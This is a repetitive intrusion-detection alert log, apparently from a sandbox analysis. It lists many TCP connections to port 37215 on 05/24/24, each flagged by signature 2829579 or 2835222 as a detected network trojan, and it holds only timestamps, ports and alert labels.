              Timestamp:05/24/24-10:59:16.868436
              SID:2829579
              Source Port:55018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595513
              SID:2829579
              Source Port:49604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638168
              SID:2829579
              Source Port:46692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308732
              SID:2829579
              Source Port:39206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347823
              SID:2829579
              Source Port:34692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623217
              SID:2835222
              Source Port:54890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920545
              SID:2835222
              Source Port:48554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361549
              SID:2835222
              Source Port:40316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724402
              SID:2829579
              Source Port:54176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537069
              SID:2829579
              Source Port:33112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601526
              SID:2835222
              Source Port:43932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368699
              SID:2835222
              Source Port:43276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491800
              SID:2835222
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797321
              SID:2829579
              Source Port:46674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705381
              SID:2829579
              Source Port:51108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917983
              SID:2835222
              Source Port:46226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393893
              SID:2829579
              Source Port:33282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724617
              SID:2829579
              Source Port:36538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378122
              SID:2829579
              Source Port:60766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055297
              SID:2835222
              Source Port:46778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044314
              SID:2835222
              Source Port:43884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878218
              SID:2829579
              Source Port:34238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111431
              SID:2835222
              Source Port:60770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108545
              SID:2835222
              Source Port:49752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636621
              SID:2829579
              Source Port:46358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360965
              SID:2829579
              Source Port:55706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433494
              SID:2829579
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186089
              SID:2829579
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458276
              SID:2835222
              Source Port:38660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195084
              SID:2829579
              Source Port:60350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059476
              SID:2829579
              Source Port:38412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423464
              SID:2835222
              Source Port:37692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515538
              SID:2829579
              Source Port:58320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821741
              SID:2829579
              Source Port:40224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341404
              SID:2829579
              Source Port:55678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488206
              SID:2835222
              Source Port:37960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638303
              SID:2829579
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485829
              SID:2829579
              Source Port:55286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727005
              SID:2829579
              Source Port:50008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207704
              SID:2829579
              Source Port:39762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474583
              SID:2829579
              Source Port:60322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362179
              SID:2829579
              Source Port:59638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692631
              SID:2829579
              Source Port:58856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858970
              SID:2835222
              Source Port:45010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360559
              SID:2835222
              Source Port:38552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153171
              SID:2829579
              Source Port:35270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433774
              SID:2829579
              Source Port:45872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663736
              SID:2829579
              Source Port:42092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661991
              SID:2829579
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689654
              SID:2835222
              Source Port:56136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409184
              SID:2835222
              Source Port:43366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279089
              SID:2829579
              Source Port:37278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400467
              SID:2829579
              Source Port:52616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404430
              SID:2829579
              Source Port:46162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162338
              SID:2829579
              Source Port:56668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080862
              SID:2829579
              Source Port:49276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116086
              SID:2835222
              Source Port:50156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.970787
              SID:2829579
              Source Port:40130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431615
              SID:2835222
              Source Port:39620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988483
              SID:2835222
              Source Port:59060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572648
              SID:2829579
              Source Port:49426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538061
              SID:2829579
              Source Port:38840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517856
              SID:2835222
              Source Port:41578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864930
              SID:2835222
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685342
              SID:2829579
              Source Port:37900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205905
              SID:2835222
              Source Port:42220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460469
              SID:2835222
              Source Port:53582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.580020
              SID:2835222
              Source Port:47774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764955
              SID:2835222
              Source Port:41126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664407
              SID:2829579
              Source Port:38534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575119
              SID:2829579
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430595
              SID:2835222
              Source Port:48444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882528
              SID:2829579
              Source Port:37538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333823
              SID:2829579
              Source Port:51604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340523
              SID:2835222
              Source Port:46154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.068060
              SID:2835222
              Source Port:49026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449042
              SID:2835222
              Source Port:47002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928640
              SID:2835222
              Source Port:59776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448777
              SID:2835222
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.818040
              SID:2829579
              Source Port:51326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.815996
              SID:2835222
              Source Port:36958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055712
              SID:2835222
              Source Port:33176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692683
              SID:2829579
              Source Port:45662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858923
              SID:2835222
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451911
              SID:2835222
              Source Port:35404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536208
              SID:2835222
              Source Port:35290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858373
              SID:2835222
              Source Port:36218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775281
              SID:2835222
              Source Port:35382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692648
              SID:2835222
              Source Port:38496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918390
              SID:2829579
              Source Port:47056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923381
              SID:2829579
              Source Port:38916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371979
              SID:2835222
              Source Port:56350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642267
              SID:2829579
              Source Port:43932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345359
              SID:2835222
              Source Port:60026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121532
              SID:2829579
              Source Port:45154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705310
              SID:2829579
              Source Port:52226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835231
              SID:2829579
              Source Port:33402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368717
              SID:2829579
              Source Port:59680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.365392
              SID:2829579
              Source Port:57966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530801
              SID:2829579
              Source Port:43934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100593
              SID:2829579
              Source Port:41954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749139
              SID:2835222
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502930
              SID:2829579
              Source Port:40366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253704
              SID:2829579
              Source Port:35736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858993
              SID:2835222
              Source Port:38626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246417
              SID:2835222
              Source Port:48528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994048
              SID:2829579
              Source Port:46242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547963
              SID:2829579
              Source Port:45062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396710
              SID:2835222
              Source Port:52738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049184
              SID:2835222
              Source Port:36916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098186
              SID:2835222
              Source Port:55086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802689
              SID:2835222
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162985
              SID:2829579
              Source Port:50792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148818
              SID:2829579
              Source Port:58476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507051
              SID:2829579
              Source Port:35706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574565
              SID:2835222
              Source Port:38670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444027
              SID:2835222
              Source Port:45950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641552
              SID:2829579
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530879
              SID:2829579
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636779
              SID:2835222
              Source Port:55574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428951
              SID:2835222
              Source Port:40382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164046
              SID:2835222
              Source Port:52982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445866
              SID:2835222
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245580
              SID:2835222
              Source Port:57640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097739
              SID:2835222
              Source Port:53984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545148
              SID:2835222
              Source Port:33032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589143
              SID:2829579
              Source Port:59272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923967
              SID:2829579
              Source Port:45658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798858
              SID:2835222
              Source Port:46836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727326
              SID:2829579
              Source Port:46522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209673
              SID:2829579
              Source Port:47774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053681
              SID:2829579
              Source Port:36798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635884
              SID:2835222
              Source Port:47472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267796
              SID:2829579
              Source Port:55836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599197
              SID:2829579
              Source Port:39698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920650
              SID:2829579
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390592
              SID:2835222
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663355
              SID:2835222
              Source Port:52832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873859
              SID:2829579
              Source Port:48434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044754
              SID:2829579
              Source Port:60996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186447
              SID:2829579
              Source Port:51886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516546
              SID:2829579
              Source Port:46946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117249
              SID:2835222
              Source Port:33020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435420
              SID:2829579
              Source Port:43464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870421
              SID:2835222
              Source Port:50244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530869
              SID:2829579
              Source Port:39116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823625
              SID:2835222
              Source Port:42438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327809
              SID:2835222
              Source Port:59786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063252
              SID:2829579
              Source Port:59868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743056
              SID:2829579
              Source Port:43890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.071117
              SID:2829579
              Source Port:59118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596586
              SID:2835222
              Source Port:47582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099185
              SID:2829579
              Source Port:55358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076341
              SID:2835222
              Source Port:38124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157665
              SID:2835222
              Source Port:54460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398327
              SID:2829579
              Source Port:34038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478420
              SID:2829579
              Source Port:35884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545085
              SID:2829579
              Source Port:33396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802808
              SID:2835222
              Source Port:34378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926892
              SID:2829579
              Source Port:57004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284817
              SID:2835222
              Source Port:35534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866332
              SID:2835222
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334210
              SID:2835222
              Source Port:51322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576437
              SID:2829579
              Source Port:60468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817857
              SID:2835222
              Source Port:54046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878306
              SID:2829579
              Source Port:44758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516760
              SID:2829579
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462808
              SID:2835222
              Source Port:38326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358605
              SID:2835222
              Source Port:49890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068718
              SID:2829579
              Source Port:46768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878900
              SID:2829579
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975227
              SID:2829579
              Source Port:37396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118388
              SID:2829579
              Source Port:51898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664539
              SID:2829579
              Source Port:47866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516314
              SID:2835222
              Source Port:41604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987142
              SID:2835222
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768065
              SID:2835222
              Source Port:44138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347617
              SID:2829579
              Source Port:55458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358625
              SID:2829579
              Source Port:44312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074220
              SID:2835222
              Source Port:56270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123783
              SID:2835222
              Source Port:57304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432220
              SID:2829579
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432245
              SID:2835222
              Source Port:54552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055581
              SID:2829579
              Source Port:60592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188402
              SID:2829579
              Source Port:55600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282985
              SID:2829579
              Source Port:33766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114709
              SID:2829579
              Source Port:52454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119407
              SID:2835222
              Source Port:56588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596625
              SID:2829579
              Source Port:51166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208205
              SID:2829579
              Source Port:49004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424170
              SID:2829579
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544301
              SID:2829579
              Source Port:59296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878258
              SID:2829579
              Source Port:58120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065640
              SID:2835222
              Source Port:51716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755559
              SID:2829579
              Source Port:59282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125205
              SID:2835222
              Source Port:40052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.192989
              SID:2835222
              Source Port:42088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426357
